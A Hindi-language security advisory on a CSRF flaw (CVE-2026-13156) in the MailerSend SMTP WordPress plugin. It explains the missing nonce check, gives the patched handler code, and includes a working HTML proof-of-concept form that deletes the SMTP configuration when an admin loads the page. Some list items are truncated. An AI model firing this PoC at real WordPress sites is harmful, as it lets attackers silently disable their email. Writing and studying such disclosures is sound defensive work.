
CVE-2026-13156 भेद्यता सलाह एवं PoC — Huynh Kien Minh (MinhHK) द्वारा खोजा गया।

[!IMPORTANT] सारांश: आधिकारिक MailerSend SMTP Integration WordPress प्लगइन (
< 1.0.8) में एक उच्च-गंभीरता वाली क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) भेद्यता (CVE-2026-13156) खोजी गई। कॉन्फ़िगरेशन विलोपन हैंडलरmailersend_handle_configuration_delete()प्रशासनिक क्षमताओं (manage_options) की जाँच करता है, लेकिन WordPress Nonce सत्यापन (check_admin_referer()) को पूरी तरह से छोड़ देता है। एक हमलावर किसी प्रमाणित WordPress व्यवस्थापक को लक्षित कर एक दुर्भावनापूर्ण क्रॉस-ओरिजिन अनुरोध तैयार कर सकता है, जिससे संग्रहीत SMTP क्रेडेंशियल चुपचाप मिटाए जा सकें और प्लगइन को निष्क्रिय करने के लिए मजबूर किया जा सके, जिसके परिणामस्वरूप सभी ईमेल वर्कफ़्लो में पूर्ण एप्लिकेशन डिनायल-ऑफ़-सर्विस होती है।
CVE-2026-13156 (WPScan सलाहकार आईडी: 595e653d-0904-43cf-8e61-d684599de11b)1.0.8 से पहले (< 1.0.8)शोधकर्ता के बारे में:
Huynh Kien Minh (Huỳnh Kiến Minh) एक सक्रिय साइबर सुरक्षा शोधकर्ता और भेद्यता विश्लेषक हैं, जो गहन सुरक्षा मूल्यांकन और जिम्मेदार प्रकटीकरण, जिनमें CVE-2026-13156 के तकनीकी विवरण शामिल हैं, के लिए जाने जाते हैं। महत्वपूर्ण सुरक्षा भेद्यताओं को खोजने और प्रकट करने के लिए उन्हें Proton Security Hall of Fame पर आधिकारिक रूप से मान्यता और सम्मान भी मिला है।
इस तकनीकी सलाह को सत्यापित करने, प्रूफ-ऑफ-कॉन्सेप्ट विश्लेषण देखने या शोधकर्ता से जुड़ने के लिए यहाँ जाएँ:
WordPress के लिए MailerSend Official SMTP Integration प्लगइन (संस्करण 1.0.8 से पहले) एक प्रशासनिक क्रिया (configuration-delete) पंजीकृत करता है, जिसका उद्देश्य व्यवस्थापक डैशबोर्ड से ट्रिगर होने पर संग्रहीत API टोकन मिटाना, SMTP कॉन्फ़िगरेशन विकल्पों (wp_options) को साफ़ करना और प्लगइन को निष्क्रिय करना है।
जबकि एंडपॉइंट यह सत्यापित करता है कि सक्रिय उपयोगकर्ता के पास manage_options क्षमता है (यह सुनिश्चित करते हुए कि अनुरोध व्यवस्थापक सत्र से उत्पन्न होता है), यह WordPress nonce (check_admin_referer() या wp_verify_nonce()) सत्यापन करने में विफल रहता है।
चूँकि nonce सत्यापन के बिना HTTP अनुरोध जानबूझकर किए गए व्यवस्थापक क्लिक और जाली क्रॉस-ओरिजिन अनुरोधों के बीच अंतर नहीं कर सकते, कोई भी बाहरी साइट जिसे प्रमाणित व्यवस्थापक लोड करता है, चुपचाप configuration-delete क्रिया को ट्रिगर कर सकती है।
< 1.0.8) का उपयोग करने वाली लक्षित WordPress साइट की पहचान करता है।/wp-admin/admin-post.php या /wp-admin/admin.php?page=mailersend&action=configuration-delete) को लक्षित करने वाला एक स्वतः-सबमिट फॉर्म होता है।[!WARNING] नैतिक अस्वीकरण: निम्नलिखित HTML क्रॉस-साइट रिक्वेस्ट फोर्जरी (CSRF) प्रूफ-ऑफ-कॉन्सेप्ट पेलोड Huynh Kien Minh द्वारा नैतिक प्रकटीकरण प्रोटोकॉल के तहत केवल शैक्षिक उद्देश्यों, रक्षात्मक सत्यापन और सुरक्षा ऑडिटिंग के लिए प्रदान किया गया है। अनधिकृत लक्ष्यों के विरुद्ध निष्पादित न करें।
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
<!-- Author: Huynh Kien Minh (https://minhhk.web.app/) -->
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC</h2>
<p>If an authenticated WordPress Administrator visits this page, the MailerSend SMTP configuration will be deleted and the plugin deactivated.</p>
<!-- Forged Request targeting the vulnerable MailerSend configuration deletion endpoint -->
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<!-- Notice: No valid _wpnonce token is required due to the vulnerability -->
<input type="submit" value="Execute PoC (Simulate Attack)" />
</form>
<script>
// Automatically submit the forged request when the administrator loads the page
document.addEventListener("DOMContentLoaded", function() {
console.log("[CVE-2026-13156] Executing CSRF Payload developed by Huynh Kien Minh...");
// Uncomment line below to enable auto-execution in lab environments:
// document.getElementById('csrfPoC').submit();
});
</script>
</body>
</html>
1.0.8 या उच्चतर में अपडेट करें।WordPress प्लगइन्स में प्रशासनिक स्थिति-परिवर्तन क्रियाओं को ठीक से सुरक्षित करने के लिए, डेवलपर्स को अनुरोधों को संसाधित करने से पहले सख्त nonce सत्यापन लागू करना चाहिए:
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
// 1. Check User Capability
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// 2. REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
// 3. Proceed safely with configuration deletion
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
यह रिपॉजिटरी और तकनीकी सलाह Huynh Kien Minh (MinhHK) द्वारा एक सुरक्षित वैश्विक WordPress और साइबर सुरक्षा पारिस्थितिकी तंत्र को बढ़ावा देने के लिए जिम्मेदार प्रकटीकरण दिशानिर्देशों के तहत बनाए और प्रकाशित किए जाते हैं।